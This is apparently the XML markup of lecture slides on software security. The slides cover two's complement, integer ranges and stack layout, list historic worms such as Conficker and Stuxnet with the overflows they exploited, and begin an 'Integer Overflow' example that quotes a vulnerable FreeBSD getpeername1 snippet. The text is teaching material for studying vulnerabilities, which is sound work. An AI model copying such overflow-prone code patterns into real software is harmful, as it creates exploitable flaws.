      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16423" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20D14A64-92D7-1D4C-82E3-ABA085BDD2D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5076825" y="3400425"/>
            <a:ext cx="1809750" cy="144780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24" name="Text Box 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21C64A3D-FC32-C94F-BFF0-D115381FE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4514" y="3505200"/>
            <a:ext cx="1893887" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCCC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r">
              <a:buFontTx/>
              <a:buNone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Arranged like a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:buFontTx/>
              <a:buNone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real frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16425" name="Freeform 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060D7278-B2CA-C348-9D98-F24B703771FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467601" y="4202114"/>
            <a:ext cx="2873375" cy="890587"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2872845"/>
              <a:gd name="T1" fmla="*/ 10356 h 890697"/>
              <a:gd name="T2" fmla="*/ 2412280 w 2872845"/>
              <a:gd name="T3" fmla="*/ 72448 h 890697"/>
              <a:gd name="T4" fmla="*/ 2830355 w 2872845"/>
              <a:gd name="T5" fmla="*/ 445041 h 890697"/>
              <a:gd name="T6" fmla="*/ 2530212 w 2872845"/>
              <a:gd name="T7" fmla="*/ 825055 h 890697"/>
              <a:gd name="T8" fmla="*/ 1743345 w 2872845"/>
              <a:gd name="T9" fmla="*/ 825055 h 8906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72845"/>
              <a:gd name="T16" fmla="*/ 0 h 890697"/>
              <a:gd name="T17" fmla="*/ 2872845 w 2872845"/>
              <a:gd name="T18" fmla="*/ 890697 h 8906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72845" h="890697">
                <a:moveTo>
                  <a:pt x="0" y="10377"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="335756" y="19604"/>
                  <a:pt x="1933045" y="0"/>
                  <a:pt x="2402945" y="72637"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2872845" y="145274"/>
                  <a:pt x="2799821" y="320436"/>
                  <a:pt x="2819400" y="446196"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2838979" y="571956"/>
                  <a:pt x="2700888" y="763697"/>
                  <a:pt x="2520420" y="827197"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2339952" y="890697"/>
                  <a:pt x="1839979" y="805766"/>
                  <a:pt x="1736593" y="827197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08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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92C59B9-3654-D849-8007-3B8795846D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Two’s Complement</a:t>
            </a:r>
          </a:p>
        </p:txBody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93396439-239D-A64D-9299-F9CD4B3977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50919" y="3190936"/>
            <a:ext cx="5621343" cy="1560406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Binary representation of negative integers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Represent X (where X&lt;0) as 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" baseline="30000" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>-|X|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>N is word size (e.g., 32 bits on x86 architecture)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C796DBFD-0035-6446-B74B-74AE06518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8744" y="2862606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0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28A30AD5-1EA9-E141-8976-D2E4FC5F5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3544" y="2862606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0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0A663F19-D4D5-304F-AA81-D51C96D53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8344" y="2862606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0</a:t>
            </a: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5E37F0DD-2996-5F42-B9DE-633A2E085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3144" y="2862606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0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67E0156F-CA92-5B49-B8FE-305E2E463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4145" y="2938807"/>
            <a:ext cx="356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…</a:t>
            </a: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4FEF300B-F2F3-FF4F-8924-0907BB4CD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7544" y="2862606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0</a:t>
            </a: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C6F8D974-D1FB-CA4E-BD17-179E03782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2344" y="2862606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1</a:t>
            </a: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A8A30F36-CCCF-D448-9C3E-24E82899A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8744" y="3543644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0</a:t>
            </a:r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60A6CD95-C003-4B44-96B7-A9BA803DF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3544" y="3543644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1</a:t>
            </a:r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E5656202-74A5-A442-96EC-F0B20415D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8344" y="3543644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1</a:t>
            </a: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B0932308-22DF-C246-91EC-898697797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3144" y="3543644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1</a:t>
            </a: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2D8F04BF-11FD-E748-BA9F-CFD69BEC1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4145" y="3619844"/>
            <a:ext cx="356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…</a:t>
            </a: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8D11EC10-F397-5144-BEA9-45F75A33E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7544" y="3543644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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD1D09A-13E8-C14D-9EB8-63C0B0EB2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2344" y="3543644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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{188FBC32-AF01-FB44-9354-55B008F89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8744" y="4229444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1</a:t>
            </a:r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DA55E0B1-13F5-F244-BBED-C4ECD88DE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3544" y="4229444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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C0A801-994B-9D4B-83EC-03A631C80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8344" y="4229444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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90ACB7D9-549A-DD45-A528-E953FF4C3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3144" y="4229444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1</a:t>
            </a:r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8CC620FB-1289-934A-970B-E50C10C65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4145" y="4305644"/>
            <a:ext cx="356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…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26BFF057-5683-C143-B638-5A90FB279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7544" y="4229444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1</a:t>
            </a:r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2E69490A-8D3B-C54D-BD1B-01ED0663D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2344" y="4229444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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3960DE63-082C-034E-A3F1-58FA27874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8744" y="4839044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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB82830-7D29-3740-9135-6AC2CFDB1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3544" y="4839044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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{657560A5-4995-A047-88D0-253C167B6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8344" y="4839044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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020D6B8B-C622-3748-BEC6-54C1987A5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3144" y="4839044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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF82493F-441E-764F-BF1D-D82013E90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4145" y="4915244"/>
            <a:ext cx="356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…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3FE553A-365B-4247-9D5F-5EAF23468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7544" y="4839044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1</a:t>
            </a:r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6DDE9F21-F27D-7E40-9F99-BDBA3A153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2344" y="4839044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0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8031E49-9D4E-1E41-9219-AC033D35C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8744" y="5448644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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64C8E08A-58FA-B445-9BD9-7F1C00696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3544" y="5448644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0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88F5135C-23D3-8A4B-B0CD-A706D6FA2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8344" y="5448644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0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3DCC753-D386-8C47-B730-464910BD5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3144" y="5448644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0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD6F349-2E10-9341-AE5C-09A1FE95E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4145" y="5524844"/>
            <a:ext cx="356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…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AD97869-6C2A-8943-AE6F-589A7A884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7544" y="5448644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0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rectangle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3286ACF5-E21E-A641-8F88-3C28A5A5D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2344" y="5448644"/>
            <a:ext cx="304800" cy="4572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0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93E89A82-41B5-6043-B2F9-C48B243AE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1044" y="2892587"/>
            <a:ext cx="2760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+mn-lt"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5395D07-575A-3144-82CA-F40DE7981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1043" y="3592127"/>
            <a:ext cx="6591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+mn-lt"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>31</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="TextBox 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7555794C-A61E-0248-9F0B-10B82ADEF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1043" y="4277927"/>
            <a:ext cx="3786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+mn-lt"/>
              </a:rPr>
              <a:t>-1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="TextBox 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B486CD58-9810-3C40-85A5-F5C72FB8F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1043" y="4887527"/>
            <a:ext cx="4187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+mn-lt"/>
              </a:rPr>
              <a:t>-2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="TextBox 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E29D5D3E-B148-154F-963C-54E2B70FD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1044" y="5497127"/>
            <a:ext cx="5677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 b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>31</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1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8" name="Oval 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48B22ECA-ABC3-C14B-BCAE-CCCBF9BDA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6344" y="4005606"/>
            <a:ext cx="609600" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr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</a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="TextBox 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAFA28D9-1D04-C748-85D2-7A59EE506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4382" y="4351232"/>
            <a:ext cx="7328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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>31 </a:t>
            </a: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??</a:t>
            </a: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9002DB1F-D74F-DA43-B1D3-83317FB36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1432" y="3737320"/>
            <a:ext cx="742950" cy="2003425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 14603 w 1149048"/>
              <a:gd name="T1" fmla="*/ 0 h 2002971"/>
              <a:gd name="T2" fmla="*/ 1153278 w 1149048"/>
              <a:gd name="T3" fmla="*/ 962731 h 2002971"/>
              <a:gd name="T4" fmla="*/ 0 w 1149048"/>
              <a:gd name="T5" fmla="*/ 2012983 h 2002971"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1149048"/>
              <a:gd name="T10" fmla="*/ 0 h 2002971"/>
              <a:gd name="T11" fmla="*/ 1149048 w 1149048"/>
              <a:gd name="T12" fmla="*/ 2002971 h 20029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49048" h="2002971">
                <a:moveTo>
                  <a:pt x="14515" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="378581" y="312057"/>
                  <a:pt x="1149048" y="624115"/>
                  <a:pt x="1146629" y="957943"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1144210" y="1291771"/>
                  <a:pt x="368905" y="1647371"/>
                  <a:pt x="0" y="2002971"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="2857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14B023-3E9F-D245-8FC7-26C962CAB881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10572750" y="382905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403478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 animBg="1"/>
      <p:bldP spid="42" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="0"/>
      <p:bldP spid="44" grpId="0"/>
      <p:bldP spid="45" grpId="0"/>
      <p:bldP spid="46" grpId="0"/>
      <p:bldP spid="47" grpId="0"/>
      <p:bldP spid="48" grpId="0" animBg="1"/>
      <p:bldP spid="49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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7045E30-7475-164B-9302-832D7CDA27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The Band Marches On</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5124" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79EA2C63-9ACA-3A4F-91CA-35EE01B4D5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10325100" cy="3630286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> (2008-09): overflow in Windows RPC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Around 10 million machines infected (estimates vary)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Stuxnet (2009-10): several zero-day overflows + same Windows RPC overflow as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Windows print spooler service, LNK shortcut display, task scheduler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Flame (2010-12): same print spooler and LNK overflows as Stuxnet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A0233A-22A7-3049-ACF2-430513F8F7CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8732400" y="1124594"/>
            <a:ext cx="1981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Largest number of machines infected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82E52F-1972-AC4D-AFBD-2685ED6A7670}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7475100" y="1599420"/>
            <a:ext cx="1126080" cy="518040"/>
            <a:chOff x="7475100" y="1599420"/>
            <a:chExt cx="1126080" cy="5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02DA525-BAFE-9346-AB88-75F024EAD1D1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7475100" y="1599420"/>
                <a:ext cx="1126080" cy="485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02DA525-BAFE-9346-AB88-75F024EAD1D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66100" y="1590780"/>
                  <a:ext cx="114372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CA7BCD9-2E98-E14D-B0A4-73B462A727AF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7485180" y="2080020"/>
                <a:ext cx="289440" cy="37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CA7BCD9-2E98-E14D-B0A4-73B462A727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76540" y="2071020"/>
                  <a:ext cx="307080" cy="55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E3A1B90-67E6-9546-8175-A57BFE4B031B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3036573" y="5499166"/>
            <a:ext cx="2313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sophisticated (?) cyberespionage virus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8404E9-5323-6345-84FA-204C03C4F746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1983660" y="5347380"/>
            <a:ext cx="933120" cy="498240"/>
            <a:chOff x="1983660" y="5347380"/>
            <a:chExt cx="93312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769DC6D-C696-6A4C-9002-3997AE7A085A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1983660" y="5347380"/>
                <a:ext cx="933120" cy="498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769DC6D-C696-6A4C-9002-3997AE7A08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75020" y="5338740"/>
                  <a:ext cx="95076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B88208F-516B-F844-A55C-E17C6C57ED4F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2126220" y="5380860"/>
                <a:ext cx="235440" cy="46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B88208F-516B-F844-A55C-E17C6C57ED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17220" y="5372220"/>
                  <a:ext cx="253080" cy="6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20760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06" name="Straight Arrow Connector 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D98885CF-6888-C642-B9EC-9433C49BFA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="21522" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2247356" y="4507929"/>
            <a:ext cx="2973388" cy="995290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228" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{502A982C-76AE-0D4F-AF4E-F06BA6B802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Integer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52229" name="TextBox 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CEAE41-E7C6-A145-8DF1-740ABF0A9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576" y="2136338"/>
            <a:ext cx="845776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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>static int getpeername1(p, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>uap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>compat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>) {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// In FreeBSD kernel, retrieves address of peer to which a socket is connected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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    …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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
